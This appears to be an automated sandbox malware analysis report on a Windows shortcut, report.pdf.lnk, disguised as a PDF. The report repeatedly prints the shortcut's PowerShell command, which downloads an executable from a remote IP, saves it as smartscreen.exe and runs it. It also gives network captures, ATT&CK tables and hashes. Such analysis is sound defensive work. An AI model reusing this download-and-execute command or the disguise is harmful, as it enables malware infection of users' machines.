Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5006Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4892Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1464Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.1459981190.0000020277770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "invoke-webrequest -uri "http://79.124.58.130:443/visitorlevy.exe" -outfile (join-path ([system.io.path]::gettemppath()) "smartscreen.exe"); start-process -filepath (join-path ([system.io.path]::gettemppath()) "smartscreen.exe")"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
report.pdf.lnk18%ReversingLabsScript-BAT.Downloader.Heuristic
report.pdf.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
https://79.124.58.130:443/VisitorLevy.exetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1454205778.00000202101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://79.124.58.130:443/VisitorLevy.exepowershell.exe, 00000000.00000002.1457901735.0000020276E10000.00000004.00000020.00020000.00000000.sdmp, report.pdf.lnktrue
      unknown
      http://79.124.58.130:443powershell.exe, 00000000.00000002.1434299738.000002020193C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1434299738.0000020201192000.00000004.00000800.00020000.00000000.sdmptrue
        unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1434299738.0000020200232000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1434299738.0000020200232000.00000004.00000800.00020000.00000000.sdmpfalse
          unknown
          https://go.micropowershell.exe, 00000000.00000002.1434299738.0000020201192000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1454205778.00000202101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Licensepowershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Iconpowershell.exe, 00000000.00000002.1454205778.0000020210070000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1434299738.0000020200001000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://79.124.58.130:443/visitorlevy.exepowershell.exe, 00000000.00000002.1457824442.00000202755B5000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1434299738.0000020200001000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1434299738.0000020200232000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              79.124.58.130
              unknownBulgaria
              50360TAMATIYA-ASBGtrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1548219
              Start date and time:2024-11-04 07:57:10 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 2m 30s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:3
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:report.pdf.lnk
              Detection:MAL
              Classification:mal80.evad.winLNK@2/5@0/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 3
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .lnk
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): dllhost.exe
              • Execution Graph export aborted for target powershell.exe, PID 5944 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              TimeTypeDescription
              01:58:23API Interceptor8x Sleep call for process: powershell.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              79.124.58.1302HSalvXIJE.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
              • 79.124.58.130:7698/en_US/all.js
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              TAMATIYA-ASBG2HSalvXIJE.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
              • 79.124.58.130
              https://bastionesan.gay/teleforser51/Get hashmaliciousUnknownBrowse
              • 79.124.49.200
              http://condenast-hub-okta-emea-7d5ea512.aibels.com/Get hashmaliciousUnknownBrowse
              • 78.128.114.103
              https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=http://gwf.ebay.com&af_web_dp=http%3A%2F%2Fdsena3.web.app%2FlH05rnad0TrainQ3b07xgwfd0TR3wH05nZ1d0TauGet hashmaliciousHTMLPhisherBrowse
              • 78.128.114.103
              https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=http://davidson-tech.ebay.com&af_web_dp=http%3A%2F%2Fdsena3.web.app%2FjH05hnhH05lly07xdavid5kZH05n-tQ3bR3whd0TR3wH05nZ1Get hashmaliciousHTMLPhisherBrowse
              • 78.128.114.103
              hmsLm3zv4eGet hashmaliciousMiraiBrowse
              • 78.128.114.66
              WDPKg5l9gbGet hashmaliciousMiraiBrowse
              • 78.128.114.66
              x86Get hashmaliciousMiraiBrowse
              • 78.128.114.66
              TaTYytHaBk.exeGet hashmaliciousUnknownBrowse
              • 87.121.98.43
              No context
              No context
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):1.1940658735648508
              Encrypted:false
              SSDEEP:3:NlllulnmWllZ:NllUmWl
              MD5:3EBBEC2F920D055DAC842B4FF84448FA
              SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
              SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
              SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:@...e................................................@..........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):5384
              Entropy (8bit):3.475088800623275
              Encrypted:false
              SSDEEP:48:1aDzqN2dJxk8QxJUxJlVb/9l6SSogZoItJZtJa1b/9lJSSogZoItJZtJO1:1aDemx9Qcbb/9WHR1Cb/9fHR1s
              MD5:E7F18E02DAC14D719A2B7D0AACC0AD35
              SHA1:BFBD0E2A9444337E370FE8B3796661477913F2BD
              SHA-256:C12D83167C0F0327EEED7C90B81BC809B32F067CDF5C36E055EF57CF59AEF0AC
              SHA-512:4CE528DDC424D12A15726BB791991704B4EF49154F32C42C197EECB11309ED0A2E6ECFFCBF1129C2ABDC59BBC6F236385D1B41D533A24227F3B26F0AE066A587
              Malicious:false
              Reputation:low
              Preview:...................................FL..................F.`.. .....8a....,'......o.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_...5.x:a.....)......j.2.....dYJ7 .REPORT~1.LNK..N......EW.>dYJ7...........................5..r.e.p.o.r.t...p.d.f...l.n.k.......X...............-.......W...........t.b......C:\Users\user\Desktop\report.pdf.lnk..5.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.A.d.o.b.e.\.A.c.r.o.b.a.t. .D.C.\.A.c.r.o.b.a.t.\.A.c.r.o.b.a.t...e.x.e.........%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe.................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.A.d.o.b.e.\.A.c.r.o.b.a.t. .D.C.\.A.c.r.o.b.a.t.\.A.c.r.o.b.a.t...e.x.e.......................................................................................................................................
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):5384
              Entropy (8bit):3.475088800623275
              Encrypted:false
              SSDEEP:48:1aDzqN2dJxk8QxJUxJlVb/9l6SSogZoItJZtJa1b/9lJSSogZoItJZtJO1:1aDemx9Qcbb/9WHR1Cb/9fHR1s
              MD5:E7F18E02DAC14D719A2B7D0AACC0AD35
              SHA1:BFBD0E2A9444337E370FE8B3796661477913F2BD
              SHA-256:C12D83167C0F0327EEED7C90B81BC809B32F067CDF5C36E055EF57CF59AEF0AC
              SHA-512:4CE528DDC424D12A15726BB791991704B4EF49154F32C42C197EECB11309ED0A2E6ECFFCBF1129C2ABDC59BBC6F236385D1B41D533A24227F3B26F0AE066A587
              Malicious:false
              Reputation:low
              Preview:...................................FL..................F.`.. .....8a....,'......o.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_...5.x:a.....)......j.2.....dYJ7 .REPORT~1.LNK..N......EW.>dYJ7...........................5..r.e.p.o.r.t...p.d.f...l.n.k.......X...............-.......W...........t.b......C:\Users\user\Desktop\report.pdf.lnk..5.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.A.d.o.b.e.\.A.c.r.o.b.a.t. .D.C.\.A.c.r.o.b.a.t.\.A.c.r.o.b.a.t...e.x.e.........%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe.................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.A.d.o.b.e.\.A.c.r.o.b.a.t. .D.C.\.A.c.r.o.b.a.t.\.A.c.r.o.b.a.t...e.x.e.......................................................................................................................................
              File type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
              Entropy (8bit):2.8482122039616256
              TrID:
              • Windows Shortcut (20020/1) 100.00%
              File name:report.pdf.lnk
              File size:2'330 bytes
              MD5:55954104c8a8dc66a41548f4eed8eeeb
              SHA1:16ccdc346e47c1a35f6bfb6ef2af307a17bdada2
              SHA256:8aaed2aa282a84b5ae31cc397c4602e2ec5b376370a19f3e8884d5333d699e34
              SHA512:c00917341d30c02f918ec0349903fbc4a91af3183240403b9e032730a6ad03b24c068f1a401c978fd426dc2a28f07aaab910e95b0e89b6abed9af25a17187b42
              SSDEEP:24:8//BHYVKVWO+/CW2jfUB30MqcSBUMkWnMqcSXdw6nfTdkF6nfT7rab2YUW:8H5ayIB03cSBH/3cSXdJxk87aPb
              TLSH:724135101FE50210F7B3AE3669FA66268A767851EE22DF4D41A00B4D5470524E878F2B
              File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
              Icon Hash:cc9292b2facdeded

              General

              Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command Line Argument:-Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")"
              Icon location:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              TimestampSource PortDest PortSource IPDest IP
              Nov 4, 2024 07:58:25.164486885 CET49753443192.168.2.779.124.58.130
              Nov 4, 2024 07:58:25.164540052 CET4434975379.124.58.130192.168.2.7
              Nov 4, 2024 07:58:25.164774895 CET49753443192.168.2.779.124.58.130
              Nov 4, 2024 07:58:25.168426991 CET49753443192.168.2.779.124.58.130
              Nov 4, 2024 07:58:25.168441057 CET4434975379.124.58.130192.168.2.7
              Nov 4, 2024 07:58:25.168495893 CET4434975379.124.58.130192.168.2.7
              Nov 4, 2024 07:58:25.179255009 CET49754443192.168.2.779.124.58.130
              Nov 4, 2024 07:58:25.179286957 CET4434975479.124.58.130192.168.2.7
              Nov 4, 2024 07:58:25.179418087 CET49754443192.168.2.779.124.58.130
              Nov 4, 2024 07:58:25.179467916 CET49754443192.168.2.779.124.58.130
              Nov 4, 2024 07:58:25.179476023 CET4434975479.124.58.130192.168.2.7
              Nov 4, 2024 07:58:25.179516077 CET4434975479.124.58.130192.168.2.7
              • 79.124.58.130:443
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.74975379.124.58.1304435944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Nov 4, 2024 07:58:25.168426991 CET177OUTGET /VisitorLevy.exe HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
              Host: 79.124.58.130:443
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.74975479.124.58.1304435944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Nov 4, 2024 07:58:25.179467916 CET177OUTGET /VisitorLevy.exe HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
              Host: 79.124.58.130:443
              Connection: Keep-Alive


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:01:58:20
              Start date:04/11/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest -Uri "http://79.124.58.130:443/VisitorLevy.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "smartscreen.exe")"
              Imagebase:0x7ff741d30000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:1
              Start time:01:58:20
              Start date:04/11/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff75da10000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Reset < >
                Memory Dump Source
                • Source File: 00000000.00000002.1461620603.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffaac3a0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 009057c5f3f33205fdbe108c6a8325d448072e810983b42a910e85181093c056
                • Instruction ID: b836e5be5869af5bee4a826242afc27dd2fd69424503b88de8aa04d9f602b652
                • Opcode Fuzzy Hash: 009057c5f3f33205fdbe108c6a8325d448072e810983b42a910e85181093c056
                • Instruction Fuzzy Hash: 2A12186290EFC58FE756977848649B4BFE0EF57610B0941FBC08ECB1E3D9199819C3A2
                Memory Dump Source
                • Source File: 00000000.00000002.1461620603.00007FFAAC3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffaac3a0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 360183c263d1611c99b7e7fe5f2a962f5a6e099b012b78a0287cddabceb4a28a
                • Instruction ID: b078a5934b58298cbdbe60d0ca213b7e00683519a8bbe1c9e5a4bbc16f41a466
                • Opcode Fuzzy Hash: 360183c263d1611c99b7e7fe5f2a962f5a6e099b012b78a0287cddabceb4a28a
                • Instruction Fuzzy Hash: B0D1677190EF8A8FF795EB6888159B5BFA0EF46710B0841FAD04DC7093DA19D819C3E1
                Memory Dump Source
                • Source File: 00000000.00000002.1461294290.00007FFAAC2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffaac2d0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
